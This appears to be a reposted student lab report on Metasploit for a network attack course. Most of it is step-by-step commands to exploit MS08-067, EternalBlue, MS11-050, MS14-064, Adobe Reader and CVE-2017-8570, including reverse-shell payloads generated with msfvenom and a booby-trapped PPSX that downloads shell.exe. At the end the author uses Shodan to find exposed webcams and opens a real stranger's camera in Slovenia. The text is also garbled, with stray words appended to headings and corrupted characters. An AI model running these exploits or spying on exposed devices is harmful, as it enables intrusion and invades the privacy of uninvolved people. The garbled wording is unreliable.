2018-2019-2 20165330《网络对抗技术》Exp5 MSF基础应用

目录


实验目的

  • 本实践目标是掌握metasploit的基本应用方式,重点经常使用的三种攻击方式的思路

返回目录html


实验内容

返回目录python


基础问题

  • 用本身的话解释什么是exploitpayloadencodelinux

    • exploit:利用漏洞,达到攻击控制受害机的一种手段
    • payload:载荷,含有执行攻击的代码,来实现任何运行在受害者环境中的程序所能作的事情
    • encode:对攻击代码进行假装,使其能正常运行并尽可能免杀

返回目录git


相关知识

关于MSFgithub

  • 主要模块:渗透攻击模块(Exploit Modules)辅助模块(Auxiliary Modules)攻击载荷(Payload Modules)空字段模块(Nop Modules)编码模块(Encoders)后渗透攻击模块(Post)
    • 查看模块源码的目录:/usr/share/metasploit-framework/modules
    • 进入某个模块可经过info查看其信息,观察其要设置的信息(带yes的为须要设置的,如有默认值则不用 设)、能够攻击的靶机(target)
      image
  • 三个用户操做界面
    • msfconsole:msfconsole
    • Armitage
      • 启动:web

        service postgresql start
        armitage
      • 在kali中就是下面的妹纸,也可点击图标启动
        image
      • 随后配置端口
      • 使用:点击connectyes
        image
      • 界面以下
        image
    • Web GUI
  • 攻击方式
    • 主动攻击
      • 搜索漏洞:search cve:2018 type:exploit platform:windows(cve后为漏洞年份)
      • 也能够:help search查看命令格式
        image
    • 攻击浏览器,获取系统控制权sql

      use exploit/windows/browser/ie_setmousecapture_uaf
       info 
       设置参数 payload options
       exploit
       上钩后
       use auxiliray/server/browser_autopwn
    • 攻击客户端应用,获取系统控制权
      • 攻击Adobe Readershell

        use exploit/windows/fileformat/adobe_cooltype_sing 
        info
        search type:exploit  name:Excel platform:windows

返回目录windows


实验步骤

一个主动攻击实践

ms08_067

攻击方:kali10.0.0.217 靶机:Win2kServer_SP0_target10.0.0.112api

ms08_067_netapi是一款Metasploit中有点老的溢出攻击载荷,攻击者利用受害者主机默认开放的SMB服务端口445,发送恶意资料到这个端口,经过MSRPC接口调用server服务的一个函数,并破坏程序的栈缓存区,得到远程代码执行权限,从而彻底控制主机。

  • 咱们首先可使用Armitage根据网段搜索出靶机:Hosts-Nmap Scan-Quick Scan(OS detect)(能够自动探测目标主机的操做系统)
    image
  • 找到咱们的靶机
    image
  • 对靶机右键选择Services,查看靶机上开启的服务,有以下服务:
    image
  • 对靶机右键选择Scan(Armitage会调用Metasploit的漏洞扫描模块,定向扫描靶机,寻找存在的漏洞,为下一步肯定攻击方法提供参考依据)
    image
  • 菜单栏中点击Attacks-Find Attacks,Armitage会自动寻找合适的攻击模块,结束会出现下图
    image
  • 此时咱们先对靶机右键选择Attack-smb-check exploits检测哪些漏洞是存在的
    image
  • 这是能够选择Attack-smb-ms08_067_netapi自动攻击,设置端口为5330,标记Use a reverse connection,点击Launch
    image
  • 发现失败。。(注意这里自动攻击会有默认的payload)
    image
  • 下面咱们进入console手动换一种payload

    use exploit/windows/smb/ms08_067_netapi //选择攻击模块
    set payload generic/shell_reverse_tcp //选择攻击载荷
    show options //查看配置信息
    show targets //查看可攻击的平台
    set RHOST 10.0.0.112 //设置靶机IP,端口默认为445
    set LPORT 5330 //成功后回连主机端口5330
    set LHOST 10.0.0.217 //设置攻方IP
    set target 1 //这里为win2k(可经过“show targets”查看可攻击的平台)
    exploit //发起渗透攻击
  • 攻击成功!
    image
  • 对靶机右键选择shell 1- interact,先输入run在输入dir查看目录信息
    image
  • 使用msfconsole效果以下
    image

ms17_010永恒之蓝

攻击方:kali 10.0.0.138 靶机:Windows7 x64 10.0.0.216

永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞致使攻击者在目标系统上能够执行任意代码。(SMB服务的做用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让二者的资源可互通有无。)

  • 进入msfconsole经过search MS17_010 platform:windows查看其可用模块,咱们选择第一个exploit/windows/smb/ms17_010_eternalblue
    image
  • 输入如下命令

    use exploit/windows/smb/ms17_010_eternalblue //选择攻击模块
    show payloads //显示可用攻击载荷
    set payload windows/x64/meterpreter/reverse_tcp //设置tcp反向链接
    info //查看须要配置的信息及可攻击的target
    set RHOST 10.0.0.216 //设置靶机IP
    set LHOST 10.0.0.138 //kali IP
    set LPORT 5330 //设置攻击端口
    set target 0 //设置win7靶机
    exploit //发起渗透攻击
  • 攻击成功
    image
  • 查看IP验证在继续后面的命令操做
    image


一个针对浏览器的攻击

ms11_050

攻击方:kali 10.0.0.138 靶机:Windows7 x64 10.0.0.216 浏览器:IE 8.0

  • kali中输入msfconsole进入控制台,依次输入如下指令

    use windows/browser/ms11_050_mshtml_cobjectelement //选择攻击模块
    set payload windows/meterpreter/reverse_http //设置http反向链接
    set SRVHOST 10.0.0.138 //设置靶机要回连的IP地址
    set LHOST 10.0.0.138 //kali IP
    set LPORT 5330 //设置攻击端口
    set URIPATH 20165330zyx //统一资源标识符路径设置
    exploit //发起渗透攻击
  • 在浏览器输入http://10.0.0.138:8080/20165330zyx,IE出现警告弹窗,提示关闭程序
    image
  • 来看msfconsole这边,没啥反应
    image
  • 参考学姐博客,在IE中点击工具-Internet选项,修改以下安全设置
    image
    image
  • 在进到地址,这回提示运行不正常的加载项或恶意加载项致使 Internet Explorer 关闭此网页
    image

ms14_064

攻击方:kali 10.0.0.138 靶机:WindowsXP 10.0.0.171 浏览器:IE 8.0

此安全更新可解决 Microsoft Windows 对象连接与嵌入 (OLE) 中 2 个私下报告的漏洞。最严重的漏洞可能在用户使用 Internet Explorer 查看经特殊设计的网页时容许远程执行代码。成功利用这些漏洞的攻击者能够在当前用户的上下文中运行任意代码。若是当前用户使用管理用户权限登陆,则攻击者可随后安装程序;查看、更改或删除数据;或者建立拥有彻底用户权限的新账户。远程攻击者利用此漏洞经过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本。

  • 进入msfconsole经过search ms14_064 platform:windows查看可选攻击模块,这里选用exploit/windows/browser/ms14_064_ole_code_execution
    image
  • 执行如下命令

    use exploit/windows/browser/ms14_064_ole_code_execution //选择攻击模块
    show payloads //显示可用攻击载荷
    set payload windows/meterpreter/reverse_tcp //设置tcp反向链接
    info //查看详细信息(发现可攻击winXP和win7)
    set SRVHOST 10.0.0.138 //设置攻方IP
    set AllowPowerShellPrompt true //由于msf中自带的漏洞利用exp调用的是 powershell。 因此msf中的exp代码只对安装powershell的系统生效
    set LHOST 10.0.0.138
    set LPORT 5330
    set target 0 //设置winXP靶机
    exploit //发起渗透攻击
  • 将生成的URL地址在winXP的IE中打开,发现成功创建了两个会话
    image
  • 此时能够用ctrl+c退出当前状态,经过输入sessions -i 1获取第一个会话链接,并输入ipconfig验证是否为靶机地址
    image


一个针对客户端的攻击

Adobe

攻击方:kali 10.0.0.138 靶机:WindowsXP 10.0.0.171 Adobe Reader:9.3.0

  • kali输入msfconsole进入控制台,依次输入如下命令

    use windows/fileformat/adobe_cooltype_sing //选择攻击模块
    set payload windows/meterpreter/reverse_tcp //设置tcp反向链接
    set LHOST 10.0.0.138 //kali IP
    set LPORT 5330 //设置攻击端口
    set FILENAME 5330.pdf //设置生成的pdf文件名
    exploit //发起攻击
    此时生成5330.pdf,咱们进入保存目录cd /root/.msf4/local,输入cp 5330.pdf /mnt/hgfs/vm复制到共享文件夹中,在移到windowsXP虚拟机中
    image
  • 控制台中输入back退出当前模块,输入如下命令进入监听模块:

    use exploit/multi/handler //进入监听模块
    set payload windows/meterpreter/reverse_tcp //设置tcp反向链接
    set LHOST 10.0.0.138 //kali IP
    set LPORT 5330 //设置攻击端口
    exploit //监听
  • 靶机中打开pdf文件
    image
  • kali中发现回连成功,输入ipconfig确认是否会连正确
    image
  • 发现无误,就能够继续后续的命令操做了

CVE-2017-8570

攻击方:kali 10.0.0.138 靶机:WindowsXP 10.0.0.216 Microsoft Office:2016 (64-bit edition)

  • 2017年7月,微软在例行的月度补丁中修复了多个Microsoft Office漏洞,其中的CVE-2017-8570漏洞为一个逻辑漏洞,利用方法简单。网上已经出现该漏洞的利用代码,影响范围较广。
  • 该漏洞为Microsoft Office的一个远程代码执行漏洞。其成因是Microsoft PowerPoint执行时会初始化Script”Moniker对象,而在PowerPoint播放动画期间会激活该对象,从而执行sct脚本(Windows Script Component)文件。攻击者能够欺骗用户运行含有该漏洞的PPT文件,致使获取和当前登陆用户相同的代码执行权限。
  • 下载Exploit toolkit CVE-2017-8570
  • 解压文件后进入该目录,生成恶意PPSX文件:python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://10.0.0.138/logo.doc(IP为攻方IP)
    image
    PS:用的时候会报错No such file or directory: 'template/template.ppsx',只要在里面建立文件夹template,将template.ppsx挪到template里便可成功。
  • 生成反弹shell的exe文件:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.138 LPORT=5330 -f exe > shell.exe(由于个人win7为64位命令中须要加入x64,IP为攻方IP)
  • 监听来自ppsx执行反弹shell:python cve-2017-8570_toolkit.py -M exp -e http://10.0.0.138/shell.exe -l shell.exe
    image
  • 进入msfconsole监听

    use exploit/multi/handler
    set PAYLOAD windows/x64/meterpreter/reverse_tcp
    set LHOST 10.0.0.138
    set LPORT 5330
    exploit
  • 将生成的Invoice.ppsx传至安装有Microsoft Office 2016的win7上,并打开该文件
    image
  • 发现回连成功
    image


成功应用任何一个辅助模块

  • msfconsole中可经过命令show auxiliary查看全部的辅助模块
  • 这里我选用了gather/shodan_search,使用shodan来搜索网络摄像头
  • 关于shodan
    • Shodan是互联网上最可怕的搜索引擎。
    • 与谷歌不一样的是,Shodan不是在网上搜索网址,而是直接进入互联网的背后通道。Shodan能够说是一款“黑暗”谷歌,一刻不停的在寻找着全部和互联网关联的服务器、摄像头、打印机、路由器等等。每月Shodan都会在大约5亿个服务器上日夜不停地搜集信息。
    • Shodan所搜集到的信息是极其惊人的。凡是连接到互联网的红绿灯、安全摄像头、家庭自动化设备以及加热系统等等都会被轻易的搜索到。其真正值得注意的能力就是能找到几乎全部和互联网相关联的东西。而Shodan真正的可怕之处就是这些设备几乎都没有安装安全防护措施,其能够随意进入
    • 更详细的介绍可参考这里
  • 下面咱们开始按如下步骤运用
    • 进入shodan_search模块:use auxiliary/gather/shodan_search
    • 查看须要设置的信息有哪些:show options
      image
      发现咱们须要设置APIKEY和QUERY,另外显示yes的两个都有默认值不用设置。
    • 先去shodan官网注册帐号,登录查看帐户API后设置APIKEY:set SHODAN_APIKEY tPZf7UpklnPZ*********JFz567WYbt
    • 设置查询网络摄像头的语句:set QUERY "webcamXP"
    • 执行:run
  • 而后看到结果(下图为部分结果)
    image
    在结尾处会有[*] Auxiliary module execution completed显示
  • 如今咱们随便选一个IP:Port,复制到浏览器中看看可不能够看到画面(选了一个Slovenia斯洛文尼亚共和国地方的。。。总以为有点恐怖。。)
    image

返回目录


离实战还缺些什么技术或步骤?

  • 目前咱们对某个漏洞的攻击仍是针对与网上搜索的资料和步骤,使用的也是很通用的攻击手段,可是攻击平台其实众多,咱们的灵活性还不够高,而且攻击的对象大部分也比较单一,对更高系统的攻击的实现仍是须要去开发的。

实验总结与体会

  • 这次实验是开始实战的很眇小的一部分,却足以让我花费不少心力,从搜寻攻击模块到找到看得懂的payload,在寻找靶机,攻击步骤很明确,攻击过程却略显心酸,好在最后大部分仍是都成功了,我对MSF的掌握也更深了一步,也使得个人实践能力更高了一层~

参考资料

相关文章
相关标签/搜索